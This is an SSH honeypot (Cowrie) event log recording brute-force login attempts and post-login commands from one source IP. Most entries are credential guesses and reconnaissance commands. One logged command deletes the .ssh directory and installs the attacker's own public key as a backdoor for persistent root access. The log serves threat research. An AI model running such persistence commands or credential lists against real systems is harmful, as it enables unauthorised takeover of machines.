{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:49.328007Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:50.438129Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T02:00:50.438885Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:51.833026Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:52.164846Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T02:00:52.165567Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:52.421114Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56030,"dst_ip":"1.2.3.4","dst_port":22,"session":"19a6a43c0826","protocol":"ssh","message":"New connection: 212.227.235.229:56030 (1.2.3.4:22) [session: 19a6a43c0826]","sensor":"my-vps","timestamp":"2025-09-09T02:00:52.911252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:52.911906Z","src_ip":"212.227.235.229","session":"19a6a43c0826"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:53.169875Z","src_ip":"212.227.235.229","session":"19a6a43c0826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:53.923347Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T02:00:53.924106Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:54.193416Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:54.241319Z","src_ip":"212.227.235.229","session":"19a6a43c0826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:00:54.796722Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T02:00:54.797770Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:55.501596Z","src_ip":"212.227.235.229","session":"19a6a43c0826"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:55.860731Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.closed","duration":"57.4","message":"Connection lost after 57.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:00:55.862114Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36276,"dst_ip":"1.2.3.4","dst_port":22,"session":"899f0e4b1eea","protocol":"ssh","message":"New connection: 212.227.235.229:36276 (1.2.3.4:22) [session: 899f0e4b1eea]","sensor":"my-vps","timestamp":"2025-09-09T02:00:59.076077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:00:59.076820Z","src_ip":"212.227.235.229","session":"899f0e4b1eea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:00:59.338600Z","src_ip":"212.227.235.229","session":"899f0e4b1eea"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:00.423048Z","src_ip":"212.227.235.229","session":"899f0e4b1eea"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:01.687705Z","src_ip":"212.227.235.229","session":"899f0e4b1eea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53368,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bc58169d0f8","protocol":"ssh","message":"New connection: 212.227.235.229:53368 (1.2.3.4:22) [session: 4bc58169d0f8]","sensor":"my-vps","timestamp":"2025-09-09T02:01:18.471640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:18.472312Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:18.554950Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234@","message":"login attempt [root/Qwer1234@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:18.929809Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:01:19.152533Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.153311Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.154172Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.237906Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:01:19.419773Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.420562Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.505386Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.506356Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53380,"dst_ip":"1.2.3.4","dst_port":22,"session":"877c6f6e64b2","protocol":"ssh","message":"New connection: 212.227.235.229:53380 (1.2.3.4:22) [session: 877c6f6e64b2]","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.589141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.589953Z","src_ip":"212.227.235.229","session":"877c6f6e64b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:19.673333Z","src_ip":"212.227.235.229","session":"877c6f6e64b2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:20.048735Z","src_ip":"212.227.235.229","session":"877c6f6e64b2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.134994Z","src_ip":"212.227.235.229","session":"877c6f6e64b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38122,"dst_ip":"1.2.3.4","dst_port":22,"session":"65415390b18d","protocol":"ssh","message":"New connection: 212.227.235.229:38122 (1.2.3.4:22) [session: 65415390b18d]","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.244427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.245409Z","src_ip":"212.227.235.229","session":"65415390b18d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.328714Z","src_ip":"212.227.235.229","session":"65415390b18d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.703840Z","src_ip":"212.227.235.229","session":"65415390b18d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.787551Z","src_ip":"212.227.235.229","session":"4bc58169d0f8"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:21.788726Z","src_ip":"212.227.235.229","session":"65415390b18d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40166,"dst_ip":"1.2.3.4","dst_port":22,"session":"045ab9febd76","protocol":"ssh","message":"New connection: 212.227.235.229:40166 (1.2.3.4:22) [session: 045ab9febd76]","sensor":"my-vps","timestamp":"2025-09-09T02:01:23.424246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:23.425142Z","src_ip":"212.227.235.229","session":"045ab9febd76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:23.654979Z","src_ip":"212.227.235.229","session":"045ab9febd76"}
{"eventid":"cowrie.login.failed","username":"service","password":"!","message":"login attempt [service/!] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:24.616866Z","src_ip":"212.227.235.229","session":"045ab9febd76"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:25.847804Z","src_ip":"212.227.235.229","session":"045ab9febd76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48850,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4eb9abd1795","protocol":"ssh","message":"New connection: 212.227.235.229:48850 (1.2.3.4:22) [session: e4eb9abd1795]","sensor":"my-vps","timestamp":"2025-09-09T02:01:26.051412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:26.052553Z","src_ip":"212.227.235.229","session":"e4eb9abd1795"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:01:26.277919Z","src_ip":"212.227.235.229","session":"e4eb9abd1795"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T02:01:27.217172Z","src_ip":"212.227.235.229","session":"e4eb9abd1795"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:01:28.443993Z","src_ip":"212.227.235.229","session":"e4eb9abd1795"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43502,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e0155d3113a","protocol":"ssh","message":"New connection: 212.227.235.229:43502 (1.2.3.4:22) [session: 9e0155d3113a]","sensor":"my-vps","timestamp":"2025-09-09T02:01:33.454368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:01:33.468532Z","src_ip":"212.227.235.229","session":"9e0155d3113a"}
